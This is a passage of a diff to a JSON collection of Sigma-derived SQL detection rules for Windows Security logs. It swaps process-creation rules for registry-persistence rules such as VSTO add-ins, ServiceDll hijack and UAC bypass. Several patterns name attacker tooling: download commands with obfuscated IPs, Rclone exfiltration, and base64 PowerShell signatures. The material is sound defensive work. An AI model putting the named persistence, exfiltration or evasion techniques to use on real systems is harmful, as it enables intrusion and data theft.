(OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Suspicious New Instance Of An Office COM Object", - "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "title": "Potential Persistence Via Visual Studio Tools for Office", + "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", "status": "experimental", - "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. 
(See vba2clr project in the references)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.t1137.006", + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of office automation via scripting" + "Legitimate Addin Installation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (NewProcessName LIKE 
'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_office_svchost_parent.yml" + "filename": "registry_set_persistence_office_vsto.yml" }, { - "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", - "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "status": "experimental", - "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "@gott_cyber", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "HackTool - 
PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Potential Persistence Via Custom Protocol Handler", + "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" - ], - "filename": "proc_creation_win_hktl_powertool.yml" - }, - { - "title": "Obfuscated IP Download", - "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", - "status": "experimental", - "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) 
in an URL combined with a download command", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.discovery" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering a new custom protocol handler" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND NewValue LIKE 'URL:%' ESCAPE '\\') AND NOT ((NewValue LIKE 'URL:ms-%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" + "filename": "registry_set_persistence_custom_protocol_handler.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", - "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to 
achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "JSC Convert Javascript To Executable", - "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", - "status": "experimental", - "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", - "author": "frack113", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of 
user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.persistence" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE 
'\\')))" ], - "filename": "proc_creation_win_lolbin_jsc.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "title": "DNS-over-HTTPS Enabled by Registry", + "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "author": "Austin Songer", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1140", + "attack.t1112" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND NewValue = 'DWORD 
(0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND NewValue = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_dns_over_https_enabled.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine 
LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Findstr Launching .lnk File", - "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "title": "Outlook Security Settings Updated - Registry", + "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "status": "test", - "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", - "author": "Trent Liffick", + "description": "Detects changes to the registry values related to outlook security settings", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1202", - "attack.t1027.003" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND 
TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_findstr_lnk.yml" + "filename": "registry_set_office_outlook_security_settings.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "title": "ServiceDll Hijack", + "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], "falsepositives": [ - "Unlikely" + "Administrative scripts", + "Installation of a service" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing 
registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_public_folder.yml" + "filename": "registry_set_servicedll_hijack.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 
'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ], "falsepositives": [ - "Software installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND 
Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" ], - 
"filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "Esentutl Steals Browser Information", - "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "title": "Potential Persistence Via Scrobj.dll COM Hijacking", + "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", "status": "experimental", - "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of the dll." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE 